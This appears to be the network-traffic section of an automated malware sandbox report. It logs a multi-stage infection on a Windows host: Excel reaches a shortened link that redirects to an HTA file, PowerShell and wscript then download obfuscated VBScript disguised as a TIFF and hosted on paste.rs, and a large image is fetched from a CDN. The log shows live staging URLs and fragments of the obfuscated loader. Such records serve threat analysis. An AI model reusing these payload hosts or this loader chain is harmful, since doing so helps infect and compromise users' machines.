                                                                                                                    Dec 11, 2024 10:53:59.564558983 CET1236INData Raw: 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25
                                                                                                                    Data Ascii: %30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32
                                                                                                                    Dec 11, 2024 10:53:59.564572096 CET1236INData Raw: 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25
                                                                                                                    Data Ascii: %25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30
                                                                                                                    Dec 11, 2024 10:53:59.682962894 CET1236INData Raw: 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25
                                                                                                                    Data Ascii: %32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.224916523.95.235.29803688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 11, 2024 10:54:06.239288092 CET388OUTGET /808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: 23.95.235.29
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Dec 11, 2024 10:54:07.351429939 CET1236INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 09:54:07 GMT
                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                    Last-Modified: Wed, 11 Dec 2024 05:53:32 GMT
                                                                                                                    ETag: "68a-628f837b96201"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Content-Length: 1674
                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: image/tiff
                                                                                                                    Data Raw: ff fe 44 00 69 00 6d 00 20 00 6b 00 61 00 74 00 63 00 69 00 6e 00 61 00 2c 00 20 00 73 00 75 00 62 00 73 00 75 00 6c 00 63 00 75 00 73 00 0d 00 0a 00 0d 00 0a 00 6b 00 61 00 74 00 63 00 69 00 6e 00 61 00 20 00 3d 00 20 00 22 00 68 00 3d d8 1c dd 3d d8 0c dc 93 26 ff 26 7b 26 3d d8 db dd 3d d8 9a dd 3d d8 5f dd 08 26 3d d8 56 dd 79 26 3d d8 47 dc 3d d8 19 dc 3d d8 0f dc 3d d8 09 de 74 00 3d d8 1c dd 3d d8 0c dc 93 26 ff 26 7b 26 3d d8 db dd 3d d8 9a dd 3d d8 5f dd 08 26 3d d8 56 dd 79 26 3d d8 47 dc 3d d8 19 dc 3d d8 0f dc 3d d8 09 de 74 00 3d d8 1c dd 3d d8 0c dc 93 26 ff 26 7b 26 3d d8 db dd 3d d8 9a dd 3d d8 5f dd 08 26 3d d8 56 dd 79 26 3d d8 47 dc 3d d8 19 dc 3d d8 0f dc 3d d8 09 de 70 00 3d d8 1c dd 3d d8 0c dc 93 26 ff 26 7b 26 3d d8 db dd 3d d8 9a dd 3d d8 5f dd 08 26 3d d8 56 dd 79 26 3d d8 47 dc 3d d8 19 dc 3d d8 0f dc 3d d8 09 de 73 00 3d d8 1c dd 3d d8 0c dc 93 26 ff 26 7b 26 3d d8 db dd 3d d8 9a dd 3d d8 5f dd 08 26 3d d8 56 dd 79 26 3d d8 47 dc 3d d8 19 dc 3d d8 0f dc 3d d8 09 de 3a 00 [TRUNCATED]
                                                                                                                    Data Ascii: Dim katcina, subsulcuskatcina = "h==&&{&===_&=Vy&=G===t==&&{&===_&=Vy&=G===t==&&{&===_&=Vy&=G===p==&&{&===_&=Vy&=G===s==&&{&===_&=Vy&=G===:==&&{&===_&=Vy&=G===/==&&{&===_&=Vy&=G===/==&&{&===_&=Vy&=G===p==&&{&===_&=Vy&=G===a==&&{&===_&=Vy&=G===s==&&{&===_&=Vy&=G===t==&&{&===_&=Vy&=G===e==&&{&===_&=Vy&=G===.==&&{&===_&=Vy&=G===r==&&{&===_&=Vy&=G===s==&&{&===_&=Vy&=G===/==&&{&=
                                                                                                                    Dec 11, 2024 10:54:07.351526022 CET749INData Raw: d8 db dd 3d d8 9a dd 3d d8 5f dd 08 26 3d d8 56 dd 79 26 3d d8 47 dc 3d d8 19 dc 3d d8 0f dc 3d d8 09 de 41 00 3d d8 1c dd 3d d8 0c dc 93 26 ff 26 7b 26 3d d8 db dd 3d d8 9a dd 3d d8 5f dd 08 26 3d d8 56 dd 79 26 3d d8 47 dc 3d d8 19 dc 3d d8 0f
                                                                                                                    Data Ascii: ==_&=Vy&=G===A==&&{&===_&=Vy&=G===C==&&{&===_&=Vy&=G===R==&&{&===_&=Vy&=G===W==&&{&===_&=Vy&=G===


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.224917223.95.235.29802556C:\Windows\System32\mshta.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 11, 2024 10:54:21.816819906 CET496OUTGET /808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: fr-FR
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    If-Modified-Since: Wed, 11 Dec 2024 05:43:36 GMT
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Host: 23.95.235.29
                                                                                                                    If-None-Match: "14551-628f814321468"
                                                                                                                    Dec 11, 2024 10:54:22.930915117 CET275INHTTP/1.1 304 Not Modified
                                                                                                                    Date: Wed, 11 Dec 2024 09:54:22 GMT
                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                    Last-Modified: Wed, 11 Dec 2024 05:43:36 GMT
                                                                                                                    ETag: "14551-628f814321468"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                    Connection: Keep-Alive


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.224916154.150.207.1314433220C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-11 09:53:52 UTC405OUTGET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: short.ruksk.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-11 09:53:53 UTC487INHTTP/1.1 302 Found
                                                                                                                    Date: Wed, 11 Dec 2024 09:53:53 GMT
                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                    X-DNS-Prefetch-Control: off
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                    X-Download-Options: noopen
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    Location: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta
                                                                                                                    Vary: Accept
                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                    Content-Length: 107
                                                                                                                    Connection: close
                                                                                                                    2024-12-11 09:53:53 UTC107INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 32 33 35 2e 32 39 2f 38 30 38 2f 6b 63 63 2f 6e 69 63 65 77 69 74 68 67 72 65 61 74 66 65 61 74 75 72 65 73 72 65 74 75 72 6e 66 6f 72 6d 65 62 65 73 74 74 68 69 6e 67 73 67 69 76 65 6e 73 6f 6f 66 61 72 2e 68 74 61
                                                                                                                    Data Ascii: Found. Redirecting to http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.224916354.150.207.1314433516C:\Windows\System32\mshta.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-11 09:53:57 UTC429OUTGET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: fr-FR
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: short.ruksk.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-11 09:53:58 UTC487INHTTP/1.1 302 Found
                                                                                                                    Date: Wed, 11 Dec 2024 09:53:57 GMT
                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                    X-DNS-Prefetch-Control: off
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                    X-Download-Options: noopen
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    Location: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta
                                                                                                                    Vary: Accept
                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                    Content-Length: 107
                                                                                                                    Connection: close
                                                                                                                    2024-12-11 09:53:58 UTC107INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 32 33 35 2e 32 39 2f 38 30 38 2f 6b 63 63 2f 6e 69 63 65 77 69 74 68 67 72 65 61 74 66 65 61 74 75 72 65 73 72 65 74 75 72 6e 66 6f 72 6d 65 62 65 73 74 74 68 69 6e 67 73 67 69 76 65 6e 73 6f 6f 66 61 72 2e 68 74 61
                                                                                                                    Data Ascii: Found. Redirecting to http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.224916645.63.94.2144434028C:\Windows\System32\wscript.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-11 09:54:13 UTC320OUTGET /ACRWC HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: paste.rs
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-11 09:54:14 UTC439INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 11 Dec 2024 09:54:14 GMT
                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                    Content-Length: 79694
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    permissions-policy: interest-cohort=()
                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains;
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    2024-12-11 09:54:14 UTC15945INData Raw: 0d 0a 20 20 20 20 0d 0a 5a 68 50 69 43 63 43 63 50 4e 61 7a 69 69 4c 20 3d 20 22 62 6b 57 66 6e 6b 63 4c 62 6c 70 74 48 61 42 22 0d 0a 69 6a 63 75 4e 55 75 4b 43 69 4e 63 57 4f 50 20 3d 20 22 6c 74 55 47 42 7a 47 6f 75 55 7a 6d 57 55 4b 22 0d 0a 53 4b 64 65 6d 6c 5a 66 62 71 42 52 4b 75 61 20 3d 20 22 4b 76 75 61 4b 57 50 47 6d 57 6f 4c 63 5a 78 22 0d 0a 0d 0a 6d 4b 47 57 69 76 6c 4e 50 66 47 69 41 4c 55 20 3d 20 22 4b 55 71 78 68 70 42 4c 74 4b 6d 43 4b 6e 52 22 0d 0a 61 4e 70 4c 75 4f 7a 62 70 72 69 6d 57 57 4a 20 3d 20 22 43 6d 71 4e 6e 4b 4c 64 41 70 4c 49 63 6a 78 22 0d 0a 63 72 55 76 74 70 4c 55 67 50 57 43 57 57 4e 20 3d 20 22 57 63 68 62 76 4c 63 50 6d 50 5a 70 6e 69 68 22 0d 0a 69 4b 70 6b 4b 4b 70 69 50 4c 43 64 69 78 57 20 3d 20 22 65 4c 55 5a
                                                                                                                    Data Ascii: ZhPiCcCcPNaziiL = "bkWfnkcLblptHaB"ijcuNUuKCiNcWOP = "ltUGBzGouUzmWUK"SKdemlZfbqBRKua = "KvuaKWPGmWoLcZx"mKGWivlNPfGiALU = "KUqxhpBLtKmCKnR"aNpLuOzbprimWWJ = "CmqNnKLdApLIcjx"crUvtpLUgPWCWWN = "WchbvLcPmPZpnih"iKpkKKpiPLCdixW = "eLUZ
                                                                                                                    2024-12-11 09:54:14 UTC16384INData Raw: 20 22 6f 57 4c 4c 4b 62 6b 76 74 65 55 69 47 53 47 22 0d 0a 78 65 69 67 47 4b 41 62 7a 42 68 67 4c 4c 51 20 3d 20 22 57 69 47 63 57 6f 52 5a 69 53 41 6b 4c 5a 66 22 0d 0a 4c 57 62 48 74 4c 41 69 6a 4b 55 73 49 57 4e 20 3d 20 22 52 70 57 66 4c 57 53 55 65 6b 41 6f 68 51 4e 22 0d 0a 69 4b 4c 55 7a 5a 6f 68 7a 52 6c 69 63 6c 4e 20 3d 20 22 63 65 74 6d 69 57 4c 57 57 4e 55 75 70 4a 6b 22 0d 0a 4c 63 68 4e 6c 7a 69 70 41 65 78 66 57 6b 76 20 3d 20 22 63 71 6d 4c 64 41 71 49 4c 69 78 68 69 63 64 22 0d 0a 0d 0a 57 48 57 41 4e 4b 57 61 62 76 75 65 66 75 6e 20 3d 20 22 50 69 61 6c 69 42 4f 57 50 6b 42 6d 7a 52 66 22 0d 0a 78 4c 4c 5a 54 63 4c 62 6b 61 68 4f 70 47 5a 20 3d 20 22 50 7a 49 57 4b 4c 52 61 49 50 47 76 4b 47 4b 22 0d 0a 6e 51 78 6a 63 47 7a 41 66 63 4c
                                                                                                                    Data Ascii: "oWLLKbkvteUiGSG"xeigGKAbzBhgLLQ = "WiGcWoRZiSAkLZf"LWbHtLAijKUsIWN = "RpWfLWSUekAohQN"iKLUzZohzRliclN = "cetmiWLWWNUupJk"LchNlzipAexfWkv = "cqmLdAqILixhicd"WHWANKWabvuefun = "PialiBOWPkBmzRf"xLLZTcLbkahOpGZ = "PzIWKLRaIPGvKGK"nQxjcGzAfcL
                                                                                                                    2024-12-11 09:54:14 UTC16384INData Raw: 6b 69 57 50 66 75 6c 57 4f 57 65 22 0d 0a 7a 4c 70 78 6e 63 70 4b 61 69 53 66 63 63 4c 20 3d 20 22 4c 76 68 69 57 62 50 6c 50 55 69 69 4b 66 76 22 0d 0a 68 62 62 50 4c 55 4b 4b 70 4c 74 7a 70 62 6f 20 3d 20 22 42 6d 57 6f 4c 4b 57 70 69 68 4b 4b 61 57 69 22 0d 0a 42 50 63 69 61 57 6b 4c 4f 69 70 4e 66 4c 42 20 3d 20 22 7a 4b 68 53 4c 62 57 6c 6f 47 69 6d 78 55 67 22 0d 0a 70 6f 52 50 41 70 4c 43 69 57 68 69 75 6d 4e 20 3d 20 22 64 69 63 51 70 65 75 5a 6d 4b 41 57 6e 43 4c 22 0d 0a 63 41 47 52 41 48 61 70 62 50 63 5a 69 66 6c 20 3d 20 22 67 4c 52 6e 63 6b 66 57 74 54 5a 62 76 4b 63 22 0d 0a 0d 0a 63 68 43 71 41 63 57 75 66 6b 75 4c 75 57 4c 20 3d 20 22 6a 67 76 70 63 4c 69 6d 75 4c 74 57 50 73 51 22 0d 0a 68 4c 55 68 4c 69 63 41 70 65 68 6c 4b 62 68 20 3d
                                                                                                                    Data Ascii: kiWPfulWOWe"zLpxncpKaiSfccL = "LvhiWbPlPUiiKfv"hbbPLUKKpLtzpbo = "BmWoLKWpihKKaWi"BPciaWkLOipNfLB = "zKhSLbWloGimxUg"poRPApLCiWhiumN = "dicQpeuZmKAWnCL"cAGRAHapbPcZifl = "gLRnckfWtTZbvKc"chCqAcWufkuLuWL = "jgvpcLimuLtWPsQ"hLUhLicApehlKbh =
                                                                                                                    2024-12-11 09:54:14 UTC16384INData Raw: 61 65 43 6b 71 4f 63 4b 42 7a 6d 20 3d 20 22 57 71 57 66 4f 62 61 74 57 4b 6b 4c 72 65 76 22 0d 0a 66 41 5a 61 4e 65 69 4c 63 65 50 42 57 65 63 20 3d 20 22 57 69 69 4e 57 6d 4c 4c 4b 54 47 52 55 42 47 22 0d 0a 74 4c 51 73 7a 4c 4e 42 41 55 4a 57 65 4b 7a 20 3d 20 22 48 4b 78 7a 53 6b 61 64 6b 4c 52 74 69 4c 4f 22 0d 0a 4b 55 4c 55 57 68 69 69 42 4b 6e 4f 7a 6d 4e 20 3d 20 22 4c 6e 72 47 72 66 4c 4c 66 63 74 68 4c 4c 57 22 0d 0a 0d 0a 71 4c 4a 6e 48 63 6c 69 65 6f 4a 6c 6f 5a 47 20 3d 20 22 70 47 47 65 4a 63 4c 57 49 4f 6d 4f 62 5a 65 22 0d 0a 47 65 42 65 61 71 4e 72 6b 7a 4c 6d 62 4f 4b 20 3d 20 22 43 41 66 67 42 57 74 6a 48 7a 57 6d 61 74 6f 22 0d 0a 67 47 47 43 64 71 47 62 4e 75 6b 70 4f 4b 66 20 3d 20 22 4b 71 4c 62 6f 52 74 68 69 47 69 69 42 75 6d 22
                                                                                                                    Data Ascii: aeCkqOcKBzm = "WqWfObatWKkLrev"fAZaNeiLcePBWec = "WiiNWmLLKTGRUBG"tLQszLNBAUJWeKz = "HKxzSkadkLRtiLO"KULUWhiiBKnOzmN = "LnrGrfLLfcthLLW"qLJnHclieoJloZG = "pGGeJcLWIOmObZe"GeBeaqNrkzLmbOK = "CAfgBWtjHzWmato"gGGCdqGbNukpOKf = "KqLboRthiGiiBum"
                                                                                                                    2024-12-11 09:54:14 UTC14597INData Raw: 75 4e 64 68 50 4e 78 5a 47 5a 7a 50 4c 50 22 0d 0a 71 6b 69 69 70 70 55 4b 70 4c 64 50 4c 4b 68 20 3d 20 22 6c 55 52 69 62 70 6b 63 54 6e 63 57 6c 6d 63 22 0d 0a 5a 4c 41 57 57 63 50 4c 69 75 4c 6f 5a 43 6f 20 3d 20 22 6c 50 70 54 71 41 64 6b 43 49 63 65 4c 55 4b 22 0d 0a 70 70 55 73 57 55 62 7a 5a 4c 4c 71 4b 55 7a 20 3d 20 22 66 55 48 42 6f 55 57 7a 6b 41 69 50 41 47 66 22 0d 0a 0d 0a 49 47 70 4e 4e 67 43 55 5a 62 50 4b 4c 70 69 20 3d 20 22 6f 74 6e 57 4b 4c 57 47 4c 61 4b 6e 4c 64 6b 22 0d 0a 6b 5a 4c 63 5a 52 4e 6f 6d 7a 50 65 71 68 66 20 3d 20 22 68 47 4c 55 70 57 50 4b 6e 57 6d 66 71 4b 75 22 0d 0a 57 43 6b 66 54 62 52 68 70 74 47 69 4b 51 4a 20 3d 20 22 64 5a 4b 49 69 5a 50 61 63 69 57 6d 6b 55 7a 22 0d 0a 57 4b 63 55 6d 6f 6c 57 48 4c 57 57 64 65
                                                                                                                    Data Ascii: uNdhPNxZGZzPLP"qkiippUKpLdPLKh = "lURibpkcTncWlmc"ZLAWWcPLiuLoZCo = "lPpTqAdkCIceLUK"ppUsWUbzZLLqKUz = "fUHBoUWzkAiPAGf"IGpNNgCUZbPKLpi = "otnWKLWGLaKnLdk"kZLcZRNomzPeqhf = "hGLUpWPKnWmfqKu"WCkfTbRhptGiKQJ = "dZKIiZPaciWmkUz"WKcUmolWHLWWde


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.224916754.150.207.1314433220C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-11 09:54:16 UTC405OUTGET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: short.ruksk.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-11 09:54:17 UTC487INHTTP/1.1 302 Found
                                                                                                                    Date: Wed, 11 Dec 2024 09:54:16 GMT
                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                    X-DNS-Prefetch-Control: off
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                    X-Download-Options: noopen
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    Location: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta
                                                                                                                    Vary: Accept
                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                    Content-Length: 107
                                                                                                                    Connection: close
                                                                                                                    2024-12-11 09:54:17 UTC107INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 32 33 35 2e 32 39 2f 38 30 38 2f 6b 63 63 2f 6e 69 63 65 77 69 74 68 67 72 65 61 74 66 65 61 74 75 72 65 73 72 65 74 75 72 6e 66 6f 72 6d 65 62 65 73 74 74 68 69 6e 67 73 67 69 76 65 6e 73 6f 6f 66 61 72 2e 68 74 61
                                                                                                                    Data Ascii: Found. Redirecting to http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.2249168151.101.1.1374432580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-11 09:54:18 UTC127OUTGET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
                                                                                                                    Host: res.cloudinary.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-11 09:54:18 UTC803INHTTP/1.1 200 OK
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 2230233
                                                                                                                    Content-Type: image/jpeg
                                                                                                                    Etag: "7b9a6708dc7c92995f443d0b41dbc8d0"
                                                                                                                    Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
                                                                                                                    Date: Wed, 11 Dec 2024 09:54:18 GMT
                                                                                                                    Strict-Transport-Security: max-age=604800
                                                                                                                    Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                                                    Server-Timing: cld-fastly;dur=148;cpu=1;start=2024-12-11T09:54:18.473Z;desc=miss,rtt;dur=169,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)",cloudinary;dur=134;start=2024-12-11T09:54:18.480Z
                                                                                                                    Server: Cloudinary
                                                                                                                    Timing-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                    x-request-id: 6f487a4c60d72621f2efeecff85ca20a
                                                                                                                    2024-12-11 09:54:18 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                    Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                    2024-12-11 09:54:18 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                                                                    Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
